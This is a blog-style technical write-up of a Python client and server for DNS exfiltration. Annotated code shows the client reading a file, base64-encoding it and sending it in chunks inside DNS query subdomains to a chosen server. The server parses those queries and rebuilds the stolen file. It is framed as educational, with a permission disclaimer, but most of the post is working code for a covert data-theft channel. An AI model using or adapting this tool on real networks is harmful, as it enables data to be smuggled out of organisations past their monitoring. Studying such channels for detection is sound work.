DNS Exfiltration With Python

John Burns

In this post, we dive into the mechanics behind a DNS exfiltration tool written in Python. This project demonstrates how data can be covertly transmitted via DNS queries. I built this client‑server system to study DNS exfiltration techniques in a controlled, educational environment. Below, I detail the architecture, key design decisions, and provide annotated code snippets from both the client and server implementations.


1. Overview and Architecture

The project is divided into two main components:

  • Client (client.py): Reads a file, encodes its contents in base64, splits the encoded string into chunks, and embeds each chunk into the subdomain of a DNS query. Each query carries a unique identifier, a sequence number, and the total number of chunks.
  • Server (server.py): Listens for incoming DNS queries on a specified port, extracts the subdomain, decodes the base64 data, and reconstructs the original file once all chunks are received.

System Diagram

graph LR;
    A[Client: Reads & Encodes File] --> B[Splits Data into Chunks];
    B --> C[Embeds Chunks in DNS Queries];
    C --> D[DNS Network];
    D --> E[Server: Listens on UDP Port];
    E --> F[Extracts & Decodes Data];
    F --> G[Reconstructs Original File];

2. Client Implementation

The client reads a file, encodes its contents in base64, and splits the encoded data into manageable chunks. DNS queries are then constructed with a subdomain that includes a unique session identifier, sequence information, and the chunk data.

2.1. Base64 Encoding and Chunking

To ensure the data is DNS safe, the file contents are encoded using base64. Because DNS labels cannot exceed 63 characters, the code carefully calculates the maximum allowed length for each chunk:

def encode_file_contents(file_path):
    """Read the contents of a file and encode it in base64."""
    with open(file_path, 'rb') as file:
        file_data = file.read()
    encoded_data = base64.urlsafe_b64encode(file_data).decode('ascii')
    # Replace '+' and '/' to ensure compatibility with DNS naming rules
    return encoded_data.replace('+', '-').replace('/', '_')

def chunk_data(data, size):
    """Yield successive size chunks from data."""
    for i in range(0, len(data), size):
        yield data[i:i + size]

Why these choices?

  • Base64 Encoding: Converts binary data into an ASCII representation. The URL-safe variant is used (with substitutions for ‘+’ and ‘/’) to ensure the encoded data can safely form part of a DNS subdomain.
  • Chunk Size Calculation: The client calculates the maximum allowed length for each chunk by subtracting the space taken by a unique identifier and sequence metadata. This prevents DNS label length violations (the 63-character limit).

2.2. Constructing and Sending DNS Queries

Each DNS query is built using the dnslib library. The subdomain is structured as follows:

<identifier>-<segment_index>-<total_segments>-<chunk_data>.<domain>

Here’s the relevant snippet:

def send_dns_query(subdomain, args):
    """Send DNS queries to a specified server using dnslib."""
    query = DNSRecord(q=DNSQuestion(f"{subdomain}.{args.domain}", QTYPE.A))
    query_data = query.pack()
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        sock.settimeout(2)
        sock.sendto(query_data, (args.server_ip, args.server_port))
        response, _ = sock.recvfrom(1024)
        print("Received response:", DNSRecord.parse(response))
    except socket.timeout:
        print("No response received.")
    finally:
        sock.close()

Design Considerations:

  • Timeout Handling: A two-second timeout is set to prevent the client from hanging if no response is received.
  • Unique Identifier: A unique identifier (generated with uuid4) is prepended to the data chunk. This helps the server to collate chunks belonging to the same session.
  • DNS Query Construction: The use of DNSRecord and DNSQuestion from dnslib simplifies DNS packet creation.

3. Server Implementation

The server listens for UDP packets on a specified port and processes incoming DNS queries. It extracts the embedded data from the subdomain, decodes it, and reassembles the file once all parts are received.

3.1. Parsing the DNS Query

The server uses custom parsing to extract the domain name and then splits the subdomain to recover the unique identifier, sequence number, total segments, and the encoded chunk:

def parse_dns_query_section(data):
    offset = 12  # Start after the DNS header
    labels = []
    try:
        while True:
            length = data[offset]
            if length == 0:
                offset += 1  # Move past the zero byte
                break
            offset += 1  # Move past the length byte
            label = data[offset:offset + length]
            labels.append(label.decode('ascii'))
            offset += length
        domain_name = '.'.join(labels)
        return domain_name
    except Exception as e:
        return False

Key Points:

  • Manual DNS Parsing: Instead of using a library for complete DNS packet handling (which is done for responses), the server manually parses the query section to extract only the information needed for data exfiltration.
  • Error Handling: Basic error handling is included to avoid crashes when encountering malformed DNS queries.

3.2. Processing and Reassembling Data

Once the subdomain is parsed, the server decodes the base64 chunk and stores it in a dictionary keyed by the unique identifier. When all chunks for a session have been received, the file is reassembled:

def process_query(domain_name):
    parts = domain_name.split('.')
    identifier_segment = parts[0]
    identifier, segment_index, total_segments, encoded_data = identifier_segment.split('-', 3)
    print(f"Received encoded data: {encoded_data}")  # Debug print
    try:
        decoded_data = base64.urlsafe_b64decode(encoded_data + '==')
    except Exception as e:
        print(f"Error decoding data: {e}")
        return
    index = int(segment_index)
    total = int(total_segments)
    expected_counts[identifier] = total
    data_fragments[identifier][index] = decoded_data
    if len(data_fragments[identifier]) == total:
        save_data(identifier, data_fragments[identifier])

Why these choices?

  • Dictionary for Fragment Storage: Using a defaultdict allows the server to dynamically store and index each data chunk by its sequence number.
  • Base64 Padding: The code adds padding ('==') when decoding to ensure proper base64 decoding if the chunk length isn’t a multiple of four.
  • Chunk Reassembly: Once the expected number of fragments is reached, the server concatenates them in order and writes the output to a file.

3.3. Rate Limiting with Random Delays

Before responding to a DNS query, the server introduces a randomized delay (configured via command-line parameters) to help rate limit incoming requests:

pause_time = random.randint(args.low, args.high)
time.sleep(pause_time / 1000)

Rationale:

  • Rate Limiting: This approach prevents overwhelming DNS infrastructure (or a recursive chain) by spacing out responses. It’s especially useful during testing on a local network.
  • Configurable Delay: Command-line parameters allow you to adjust the minimum (--low) and maximum (--high) delay in milliseconds.

4. Why Certain Options Were Chosen

  • dnslib Library: Both client and server use dnslib for handling DNS queries and responses. This library offers a lightweight way to pack and parse DNS packets without reinventing the wheel.
  • Base64 Encoding with URL-Safe Variants: DNS labels must conform to strict character limitations. Base64 (with substitutions) ensures the data remains valid within these constraints.
  • Unique Identifiers and Sequence Numbers: These elements are embedded in each DNS query to allow the server to correctly reassemble the transmitted file, even if packets arrive out of order.
  • Manual DNS Packet Parsing: While dnslib is used for constructing responses, the client’s subdomain carries the exfiltrated data. Manual parsing allows for extracting the encoded data directly from the subdomain.
  • Randomized Response Delay: To simulate real-world conditions and to mitigate potential abuse, the server adds a random delay to responses. This is configurable, making the tool adaptable for different testing environments.

5. Conclusion

This DNS exfiltration tool demonstrates a novel method of data transfer using DNS queries. By leveraging Python and the dnslib library, the project encodes file data into DNS subdomains, sends them over the network, and reassembles the original file on the server side.

While this project is intended for educational purposes, it provides valuable insights into how covert channels can be established using standard protocols. Always remember to use such techniques responsibly and only in environments where you have explicit permission to test.

Happy coding and secure research!


Disclaimer: This tool is for educational purposes only. Unauthorized use on networks or systems without permission is illegal and unethical.

Feel free to contribute or suggest improvements by forking the repository on GitHub: python-dns-exfiltration-client-server.